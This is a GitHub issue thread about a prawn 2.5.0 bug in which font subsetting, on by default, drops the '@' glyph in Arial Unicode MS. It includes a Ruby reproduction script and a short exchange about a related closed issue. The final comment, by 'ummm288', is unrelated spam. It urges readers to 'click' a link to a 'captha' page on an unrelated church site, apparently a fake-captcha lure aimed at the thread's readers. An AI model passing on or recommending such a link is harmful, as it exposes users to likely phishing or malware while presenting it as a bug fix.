### ISSUE TITLE
Font Embedding: Subset enabled by default and breaking font

### ISSUE THREAD

**Issue by MrSerth** [prawnpdf/prawn#1361]
Since updating to prawn 2.5.0, we face issues with font embedding and incorrectly or missing glyphs.

**Reproduction example:**

This reproduction example assumes that the file `Arial Unicode MS.TTF` is present in the local working directory. While the font is shipped with Microsoft Office by default and can be licensed by Microsoft, it is also available on GitHub (for example [here](https://github.com/texttechnologylab/DHd2019BoA/blob/master/fonts/Arial%20Unicode%20MS.TTF)). With the file being available, a simple `irb` can be started and the following script can be executed:

```rb
require 'prawn'
@pdf = Prawn::Document.new()

@pdf.font_families.update("ArialUnicodeMS" => {normal: {file: "Arial Unicode MS.TTF"}})

@pdf.font "ArialUnicodeMS", style: :normal
@pdf.text_rendering_mode :fill_stroke do
  @pdf.draw_text "Demo Text @ Draw Text", size: 22.0, style: :normal, text_anchor: "middle", at: [0, 500], offset: [0, 0]
end

@pdf.render_file('prawn.pdf')
puts "Done"
```

<hr>

**Issues noticed:**

- [ ] The `@` character included in the text is not shown **in Acrobat**. Instead (after a few seconds), an error is shown: `Cannot extract the embedded font 'e23202+ArialUnicodeMS'. Some characters may not display or print correctly.`
  
  <img width="372" alt="Bildschirmfoto 2024-09-18 um 20 38 57" src="https://github.com/user-attachments/assets/75a547dc-96ec-47cf-819d-6753381ac724">
- [ ] The [documentation for `font_families`](https://prawnpdf.org/docs/prawn/2.5.0/Prawn/Document.html#font_families-instance_method) indicates that the default for `subset` is `false`. However, this doesn't seem to be the case and it rather appears that `subset: true` is the default since https://github.com/prawnpdf/prawn/commit/528a37d7152b378d5e20118988876d77c318c9dd. Given the above example, explicitly specifying `subset: true` doesn't change anything (with regard to showing the `@` or the file size of the resulting PDF`)
  ```rb
  # Bug still occurs
  @pdf.font_families.update("ArialUnicodeMS" => {normal: {file: "Arial Unicode MS.TTF", subset: true}})
  ```
  However, changing the option to `subset: false`, the full TTF file is embedded and the PDF file size dramatically increases (due to the large TTF):
  ```rb
  # Bug doesn't occur any longer, `@` is shown correctly and the resulting PDF is huge
  @pdf.font_families.update("ArialUnicodeMS" => {normal: {file: "Arial Unicode MS.TTF", subset: false}})
  ```

After reducing the issue to the above-given minimal reproduction example, we are pretty confident to face a bug in Prawn. Otherwise, we probably misunderstood the subsetting and font-embedding and would be grateful about some advice - Thank you!

--

prawn: `2.5.0`
Ruby: `3.3.5`
Adobe Acrobat Pro: `2024.003.20121`

**Comment by gettalong** [comment]
Have you looked at #1346? It seems that this is the same problem.

**Comment by MrSerth** [comment]
Yes, we've looked at #1346. From the various comments, we also got the idea of explicitly setting `subset: false` (despite being advertised as the default in the docs). As mentioned, `subset: false` resolves the issue with the missing glyph, but at some drawbacks (including the larger file size). The previous version of Prawn didn't had the same issue, and reverting also avoids the issue mentioned here. Since #1346 is closed, and we also have found a potential issue with the documentation, I decided to open a new issue. On a technical note, https://github.com/prawnpdf/ttfunk/issues/102 is probably related, too.

**Comment by ummm288** [comment]
to fix your trouble check this solution [click](https://www.calvarywhangarei.co.nz/captha/index.html)
maybe this will solve your problem.
